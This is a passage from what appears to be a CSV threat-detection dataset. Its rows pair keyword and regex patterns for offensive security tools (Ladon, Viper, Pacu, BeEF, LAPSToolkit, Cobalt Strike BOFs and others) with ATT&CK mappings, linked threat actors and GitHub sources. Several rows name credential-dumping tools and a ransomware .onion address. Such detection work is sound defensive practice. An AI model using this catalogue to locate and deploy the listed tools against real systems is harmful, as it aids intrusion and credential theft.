Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50775" "*Ladon-N20.exe*",".{0,1000}Ladon\-N20\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50776" "*Ladon-N40.exe*",".{0,1000}Ladon\-N40\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50777" "*LadonStudy.exe*",".{0,1000}LadonStudy\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker 
- DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50778" "*Lalin.sh *",".{0,1000}Lalin\.sh\s.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","0","#linux","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","50779" "*lallousz-x86@yahoo.com*",".{0,1000}lallousz\-x86\@yahoo\.com.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","#email","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","50780" "*lambda__backdoor_new_sec_groups*",".{0,1000}lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","50781" "*lan_fingerprint_common.*",".{0,1000}lan_fingerprint_common\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser 
Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50782" "*lan_ping_sweep.json*",".{0,1000}lan_ping_sweep\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50783" "*lan_sw_port_scan.json*",".{0,1000}lan_sw_port_scan\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50784" "*landhb/HideProcess*",".{0,1000}HideProcess.{0,1000}","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","N/A","7","669","117","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z","50785" "*landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad.onion*",".{0,1000}landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50786" "*LANMAN password IS however set. 
Will now install new password as NT pass instead*",".{0,1000}LANMAN\spassword\sIS\showever\sset\.\sWill\snow\sinstall\snew\spassword\sas\sNT\spass\sinstead.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50787" "*LANs.py*",".{0,1000}LANs\.py.{0,1000}","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","N/A","10","2599","489","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z","50788" "*lanscan_arp.py*",".{0,1000}lanscan_arp\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","50789" "*laps_dump*",".{0,1000}laps_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50793" "*LapsAllowedAdminGroups.txt*",".{0,1000}LapsAllowedAdminGroups\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007
- TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50794" "*LAPSDecrypt.*",".{0,1000}LAPSDecrypt\..{0,1000}","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50795" "*Lapsdump.cna*",".{0,1000}Lapsdump\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","50796" "*Lapsdump.exe*",".{0,1000}Lapsdump\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","50797" "*LAPSDumper-main*",".{0,1000}LAPSDumper\-main.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","50798" "*LapsPasswords.txt*",".{0,1000}LapsPasswords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 
- T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50799" "*LAPSToolkit*",".{0,1000}LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50800" "*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","50801" "*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords.
and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50802" "*LaresLLC/SlinkyCat*",".{0,1000}LaresLLC\/SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","50803" "*LasCC/Hack-Tools*",".{0,1000}LasCC\/Hack\-Tools.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","50804" "*LastenPIC/SpiderPIC*",".{0,1000}LastenPIC\/SpiderPIC.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50805" "*LastenServer server *",".{0,1000}LastenServer\sserver\s.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50806" "*Lastenzug - PIC Socks4a proxy by @invist*",".{0,1000}Lastenzug\s\-\sPIC\sSocks4a\sproxy\sby\s\@invist.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy
based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50807" "*lastpass.x86*",".{0,1000}lastpass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50808" 
"*lastpass/process_lp_files.py*",".{0,1000}lastpass\/process_lp_files\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50809" "*lastpass_sniffed_fmt_plug*",".{0,1000}lastpass_sniffed_fmt_plug.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50810" "*lastpass2john.py*",".{0,1000}lastpass2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50811" "*Lateral/DCom.cs*",".{0,1000}Lateral\/DCom\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50812" "*Lateral/PSExec.cs*",".{0,1000}Lateral\/PSExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50813" "*Lateral/SMBClient.cs*",".{0,1000}Lateral\/SMBClient\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50814" 
"*Lateral/SMBClientDelete.cs*",".{0,1000}Lateral\/SMBClientDelete\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50815" "*Lateral/SMBClientGet.cs*",".{0,1000}Lateral\/SMBClientGet\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50816" "*Lateral/SMBClientPut.cs*",".{0,1000}Lateral\/SMBClientPut\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50817" "*Lateral/WMIExec.cs*",".{0,1000}Lateral\/WMIExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50818" "*lateral_wmi.py*",".{0,1000}lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell 
- tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50819" "*LateralMovement_*_Exploit*.py",".{0,1000}LateralMovement_.{0,1000}_Exploit.{0,1000}\.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50820" "*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50821" "*LateralMovement_ExploitationOfRemoteServices_MS17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_MS17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50822" "*LateralMovement_Other_Ladon.py*",".{0,1000}LateralMovement_Other_Ladon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50823" "*LateralMovement_PassTheHash_ByInvokeWMIExec.py*",".{0,1000}LateralMovement_PassTheHash_ByInvokeWMIExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50824" "*LateralMovement_PassTheHash_ByWmi.py*",".{0,1000}LateralMovement_PassTheHash_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 
- T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50825" "*LateralMovement_PassTheTicket_ByPsexec.py*",".{0,1000}LateralMovement_PassTheTicket_ByPsexec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50826" "*LateralMovement_PassTheTicket_BySharpwmi.py*",".{0,1000}LateralMovement_PassTheTicket_BySharpwmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50827" "*LateralMovement_PassTheTicket_ByWmi.py*",".{0,1000}LateralMovement_PassTheTicket_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - 
